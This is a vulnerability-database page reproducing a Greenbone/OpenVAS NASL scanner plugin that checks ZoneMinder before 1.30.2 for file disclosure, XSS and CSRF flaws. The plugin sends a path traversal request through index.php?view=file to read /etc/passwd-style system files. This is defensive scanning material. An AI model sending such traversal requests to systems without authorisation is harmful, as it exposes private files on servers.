Lucene search
+L

ZoneMinder < 1.30.2 Multiple Vulnerabilities - Active Check

🗓️ 06 Feb 2017 00:00:00Reported by Copyright (C) 2017 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 50 Views

ZoneMinder < 1.30.2 Multiple Vulnerabilitie

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
ZoneMinder - Multiple Vulnerabilities
5 Feb 201700:00
zdt
alpinelinux
AlpineLinux
CVE-2017-5367
6 Feb 201717:00
alpinelinux
alpinelinux
AlpineLinux
CVE-2017-5368
6 Feb 201717:00
alpinelinux
alpinelinux
AlpineLinux
CVE-2017-5595
6 Feb 201717:00
alpinelinux
cnvd
CNVD
Multiple Cross-Site Scripting Vulnerabilities in ZoneMinder
7 Feb 201700:00
cnvd
cnvd
CNVD
ZoneMinder Cross-Site Request Forgery Vulnerability
7 Feb 201700:00
cnvd
cnvd
CNVD
ZoneMinder 'web/views/file.php' local file inclusion vulnerability
7 Feb 201700:00
cnvd
cve
CVE
CVE-2017-5367
6 Feb 201717:00
cve
cve
CVE
CVE-2017-5368
6 Feb 201717:00
cve
cve
CVE
CVE-2017-5595
6 Feb 201717:00
cve
Rows per page
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:zoneminder:zoneminder";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.106564");
  script_version("2026-03-17T05:57:28+0000");
  script_tag(name:"last_modification", value:"2026-03-17 05:57:28 +0000 (Tue, 17 Mar 2026)");
  script_tag(name:"creation_date", value:"2017-02-06 09:54:32 +0700 (Mon, 06 Feb 2017)");
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2017-02-10 02:59:00 +0000 (Fri, 10 Feb 2017)");

  script_cve_id("CVE-2017-5595", "CVE-2017-5367", "CVE-2017-5368");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("ZoneMinder < 1.30.2 Multiple Vulnerabilities - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2017 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_zoneminder_http_detect.nasl", "os_detection.nasl");
  script_mandatory_keys("zoneminder/http/detected", "Host/runs_unixoide");
  script_require_ports("Services/www", 443);

  script_tag(name:"summary", value:"ZoneMinder is prone to multiple vulnerabilities.");

  script_tag(name:"vuldetect", value:"Tries to read the /etc/passwd file.");

  script_tag(name:"insight", value:"The following vulnerabilities exist:

  - CVE-2017-5595: File disclosure and inclusion due to unfiltered user-input being passed to
  readfile() in views/file.php which allows an authenticated attacker to read local system files
  (e.g. /etc/passwd) in the context of the web server user (www-data).

  - CVE-2017-5367: Multiple reflected XSS

  - CVE-2017-5368: CSRF since no CSRF protection exists across the entire web app.");

  script_tag(name:"impact", value:"An unauthenticated remote attacker may read arbitrary files.");

  script_tag(name:"affected", value:"ZoneMinder prior to version 1.30.2.");

  script_tag(name:"solution", value:"Update to version 1.30.2 or later.");

  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2017/Feb/11");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("traversal_func.inc");
include("os_func.inc");

if (!port = get_app_port(cpe: CPE, service: "www"))
  exit(0);

if (!dir = get_app_location(cpe: CPE, port: port))
  exit(0);

if (dir == "/")
  dir = "";

files = traversal_files("linux");

foreach pattern(keys(files)) {

  file = files[pattern];

  url = dir + "/index.php?view=file&path=/../../../../../" + file;

  if (http_vuln_check(port: port, url: url, pattern: pattern, check_header: TRUE)) {
    report = http_report_vuln_url(port: port, url: url);
    security_message(port: port, data: report);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Mar 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 26.8
CVSS 38.8
EPSS0.01996
50